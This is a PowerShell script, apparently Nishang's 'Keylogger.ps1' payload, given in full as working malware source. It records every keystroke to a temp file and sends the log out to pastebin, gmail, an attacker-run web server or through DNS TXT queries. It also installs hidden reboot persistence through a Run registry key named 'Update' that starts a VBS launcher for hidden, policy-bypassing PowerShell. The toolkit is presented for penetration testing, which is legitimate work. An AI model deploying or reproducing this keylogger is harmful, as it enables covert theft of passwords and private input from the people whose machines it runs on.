1 | <# | |
2 | .SYNOPSIS | |
3 | Nishang Payload which logs keys. | |
4 | ||
5 | .DESCRIPTION | |
6 | This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory. | |
7 | The keys are then pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded | |
8 | using the Parse_Key script in nishang. | |
9 | ||
10 | .PARAMETER persist | |
11 | Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access. | |
12 | ||
13 | .PARAMETER ExfilOption | |
14 | The method you want to use for exfiltration of data. Valid options are "gmail","pastebin","WebServer" and "DNS". | |
15 | ||
16 | .PARAMETER dev_key | |
17 | The Unique API key provided by pastebin when you register a free account. | |
18 | Unused for other options | |
19 | ||
20 | .PARAMETER username | |
21 | Username for the pastebin/gmail account where data would be exfiltrated. | |
22 | Unused for other options | |
23 | ||
24 | .PARAMETER password | |
25 | Password for the pastebin/gmail account where data would be exfiltrated. | |
26 | Unused for other options | |
27 | ||
28 | .PARAMETER URL | |
29 | The URL of the webserver where POST requests would be sent. | |
30 | ||
31 | .PARAMETER DomainName | |
32 | The DomainName, whose subdomains would be used for sending TXT queries to. | |
33 | ||
34 | .PARAMETER AuthNS | |
35 | Authoritative Name Server for the domain specified in DomainName | |
36 | ||
37 | .PARAMETER MagicString | |
38 | The string which when found at CheckURL will stop the keylogger. | |
39 | ||
40 | .PARAMETER CheckURL | |
41 | The URL which would contain the MagicString used to stop keylogging. | |
42 | ||
43 | .EXAMPLE | |
44 | PS > .\Keylogger.ps1 | |
45 | The payload will ask for all required options. | |
46 | ||
47 | .EXAMPLE | |
48 | PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis | |
49 | Use above when using the payload from non-interactive shells and no exfiltration is required. | |
50 | ||
51 | .EXAMPLE | |
52 | PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php | |
53 | Use above for exfiltration to a webserver which logs POST requests | |
54 | ||
55 | ||
56 | .EXAMPLE | |
57 | PS > .\Keylogger.ps1 -persist | |
58 | ||
59 | Use above for reboot persistence. | |
60 | ||
61 | .LINK | |
62 | http://labofapenetrationtester.com/ | |
63 | https://github.com/samratashok/nishang | |
64 | #> | |
65 | ||
66 | [CmdletBinding(DefaultParameterSetName="noexfil")] Param( | |
67 | [Parameter(Parametersetname="exfil")] | |
68 | [Switch] | |
69 | $persist, | |
70 | ||
71 | [Parameter(Parametersetname="exfil")] | |
72 | [Switch] | |
73 | $exfil, | |
74 | ||
75 | [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")] | |
76 | [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")] | |
77 | [String] | |
78 | $CheckURL, | |
79 | ||
80 | [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")] | |
81 | [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")] | |
82 | [String] | |
83 | $MagicString, | |
84 | ||
85 | [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")] | |
86 | [String] | |
87 | $ExfilOption, | |
88 | ||
89 | [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")] | |
90 | [String] | |
91 | $dev_key = "null", | |
92 | ||
93 | [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] | |
94 | [String] | |
95 | $username = "null", | |
96 | ||
97 | [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] | |
98 | [String] | |
99 | $password = "null", | |
100 | ||
101 | [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")] | |
102 | [String] | |
103 | $URL = "null", | |
104 | ||
105 | [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")] | |
106 | [String] | |
107 | $DomainName = "null", | |
108 | ||
109 | [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")] | |
110 | [String] | |
111 | $AuthNS = "null" | |
112 | ||
113 | ) | |
114 | ||
115 | ||
116 | ||
117 | $functions = { | |
118 | ||
119 | function script:Keylogger | |
120 | { | |
121 | Param ( | |
122 | [Parameter(Position = 0, Mandatory = $True)] | |
123 | [String] | |
124 | $MagicString, | |
125 | ||
126 | [Parameter(Position = 1, Mandatory = $True)] | |
127 | [String] | |
128 | $CheckURL | |
129 | ) | |
130 | ||
131 | $signature = @" | |
132 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
133 | public static extern short GetAsyncKeyState(int virtualKeyCode); | |
134 | "@ | |
135 | $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru | |
136 | $check = 0 | |
137 | while ($true) | |
138 | { | |
139 | Start-Sleep -Milliseconds 40 | |
140 | $logged = "" | |
141 | $result="" | |
142 | $shift_state="" | |
143 | $caps_state="" | |
144 | for ($char=1;$char -le 254;$char++) | |
145 | { | |
146 | $vkey = $char | |
147 | $logged = $getKeyState::GetAsyncKeyState($vkey) | |
148 | if ($logged -eq -32767) | |
149 | { | |
150 | if(($vkey -ge 48) -and ($vkey -le 57)) | |
151 | { | |
152 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
153 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
154 | if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) | |
155 | { | |
156 | $result = "S-" + $vkey | |
157 | } | |
158 | else | |
159 | { | |
160 | $result = $vkey | |
161 | } | |
162 | } | |
163 | elseif(($vkey -ge 64) -and ($vkey -le 90)) | |
164 | { | |
165 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
166 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
167 | $caps_state = [console]::CapsLock | |
168 | if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state) | |
169 | { | |
170 | $result = "S-" + $vkey | |
171 | } | |
172 | else | |
173 | { | |
174 | $result = $vkey | |
175 | } | |
176 | } | |
177 | elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222))) | |
178 | { | |
179 | $left_shift_state = $getKeyState::GetAsyncKeyState(160) | |
180 | $right_shift_state = $getKeyState::GetAsyncKeyState(161) | |
181 | if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) | |
182 | { | |
183 | $result = "S-" + $vkey | |
184 | } | |
185 | else | |
186 | { | |
187 | $result = $vkey | |
188 | } | |
189 | } | |
190 | else | |
191 | { | |
192 | $result = $vkey | |
193 | } | |
194 | $now = Get-Date; | |
195 | $logLine = "$result " | |
196 | $filename = "$env:temp\key.log" | |
197 | Out-File -FilePath $fileName -Append -InputObject "$logLine" | |
198 | ||
199 | } | |
200 | } | |
201 | $check++ | |
202 | if ($check -eq 6000) | |
203 | { | |
204 | $webclient = New-Object System.Net.WebClient | |
205 | $filecontent = $webclient.DownloadString("$CheckURL") | |
206 | if ($filecontent -eq $MagicString) | |
207 | { | |
208 | break | |
209 | } | |
210 | $check = 0 | |
211 | } | |
212 | } | |
213 | } | |
214 | ||
215 | function Keypaste | |
216 | { | |
217 | Param ( | |
218 | [Parameter(Position = 0, Mandatory = $True)] | |
219 | [String] | |
220 | $ExfilOption, | |
221 | ||
222 | [Parameter(Position = 1, Mandatory = $True)] | |
223 | [String] | |
224 | $dev_key, | |
225 | ||
226 | [Parameter(Position = 2, Mandatory = $True)] | |
227 | [String] | |
228 | $username, | |
229 | ||
230 | [Parameter(Position = 3, Mandatory = $True)] | |
231 | [String] | |
232 | $password, | |
233 | ||
234 | [Parameter(Position = 4, Mandatory = $True)] | |
235 | [String] | |
236 | $URL, | |
237 | ||
238 | [Parameter(Position = 5, Mandatory = $True)] | |
239 | [String] | |
240 | $AuthNS, | |
241 | ||
242 | [Parameter(Position = 6, Mandatory = $True)] | |
243 | [String] | |
244 | $MagicString, | |
245 | ||
246 | [Parameter(Position = 7, Mandatory = $True)] | |
247 | [String] | |
248 | $CheckURL | |
249 | ) | |
250 | ||
251 | $check = 0 | |
252 | while($true) | |
253 | { | |
254 | $read = 0 | |
255 | Start-Sleep -Seconds 5 | |
256 | $pastevalue=Get-Content $env:temp\key.log | |
257 | $read++ | |
258 | if ($read -eq 30) | |
259 | { | |
260 | Out-File -FilePath $env:temp\key.log -Force -InputObject " " | |
261 | $read = 0 | |
262 | } | |
263 | $now = Get-Date; | |
264 | $name = $env:COMPUTERNAME | |
265 | $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff") | |
266 | function post_http($url,$parameters) | |
267 | { | |
268 | $http_request = New-Object -ComObject Msxml2.XMLHTTP | |
269 | $http_request.open("POST", $url, $false) | |
270 | $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") | |
271 | $http_request.setRequestHeader("Content-length", $parameters.length); | |
272 | $http_request.setRequestHeader("Connection", "close") | |
273 | $http_request.send($parameters) | |
274 | $script:session_key=$http_request.responseText | |
275 | } | |
276 | ||
277 | function Compress-Encode | |
278 | { | |
279 | #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html | |
280 | $ms = New-Object IO.MemoryStream | |
281 | $action = [IO.Compression.CompressionMode]::Compress | |
282 | $cs = New-Object IO.Compression.DeflateStream ($ms,$action) | |
283 | $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII) | |
284 | $pastevalue | ForEach-Object {$sw.WriteLine($_)} | |
285 | $sw.Close() | |
286 | # Base64 encode stream | |
287 | $code = [Convert]::ToBase64String($ms.ToArray()) | |
288 | return $code | |
289 | } | |
290 | ||
291 | if ($exfiloption -eq "pastebin") | |
292 | { | |
293 | $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data) | |
294 | $pastevalue = [System.Convert]::ToBase64String($utfbytes) | |
295 | post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password" | |
296 | post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2" | |
297 | } | |
298 | ||
299 | elseif ($exfiloption -eq "gmail") | |
300 | { | |
301 | #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage | |
302 | $smtpserver = "smtp.gmail.com" | |
303 | $msg = new-object Net.Mail.MailMessage | |
304 | $smtp = new-object Net.Mail.SmtpClient($smtpServer ) | |
305 | $smtp.EnableSsl = $True | |
306 | $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password"); | |
307 | $msg.From = "$username@gmail.com" | |
308 | $msg.To.Add("$username@gmail.com") | |
309 | $msg.Subject = $pastename | |
310 | $msg.Body = $pastevalue | |
311 | if ($filename) | |
312 | { | |
313 | $att = new-object Net.Mail.Attachment($filename) | |
314 | $msg.Attachments.Add($att) | |
315 | } | |
316 | $smtp.Send($msg) | |
317 | } | |
318 | ||
319 | elseif ($exfiloption -eq "webserver") | |
320 | { | |
321 | $Data = Compress-Encode | |
322 | post_http $URL $Data | |
323 | } | |
324 | elseif ($ExfilOption -eq "DNS") | |
325 | { | |
326 | $lengthofsubstr = 0 | |
327 | $code = Compress-Encode | |
328 | $queries = [int]($code.Length/63) | |
329 | while ($queries -ne 0) | |
330 | { | |
331 | $querystring = $code.Substring($lengthofsubstr,63) | |
332 | Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS" | |
333 | $lengthofsubstr += 63 | |
334 | $queries -= 1 | |
335 | } | |
336 | $mod = $code.Length%63 | |
337 | $query = $code.Substring($code.Length - $mod, $mod) | |
338 | Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS" | |
339 | ||
340 | } | |
341 | ||
342 | $check++ | |
343 | if ($check -eq 6000) | |
344 | { | |
345 | $check = 0 | |
346 | $webclient = New-Object System.Net.WebClient | |
347 | $filecontent = $webclient.DownloadString("$CheckURL") | |
348 | if ($filecontent -eq $MagicString) | |
349 | { | |
350 | break | |
351 | } | |
352 | } | |
353 | } | |
354 | } | |
355 | } | |
356 | ||
357 | ||
358 | ||
359 | $modulename = $script:MyInvocation.MyCommand.Name | |
360 | if($persist -eq $True) | |
361 | { | |
362 | $name = "persist.vbs" | |
363 | $options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)" | |
364 | $options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)" | |
365 | $func = $functions.Tostring() | |
366 | Out-File -InputObject '$functions = {' -Force $env:TEMP\$modulename | |
367 | Out-File -InputObject $func -Append $env:TEMP\$modulename | |
368 | Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename | |
369 | Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename | |
370 | Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename | |
371 | ||
372 | New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force | |
373 | echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name | |
374 | echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name | |
375 | ||
376 | } | |
377 | ||
378 | else | |
379 | { | |
380 | if ($exfil -eq $True) | |
381 | { | |
382 | start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL) | |
383 | start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL) | |
384 | } | |
385 | else | |
386 | { | |
387 | start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL) | |
388 | } | |
389 | } |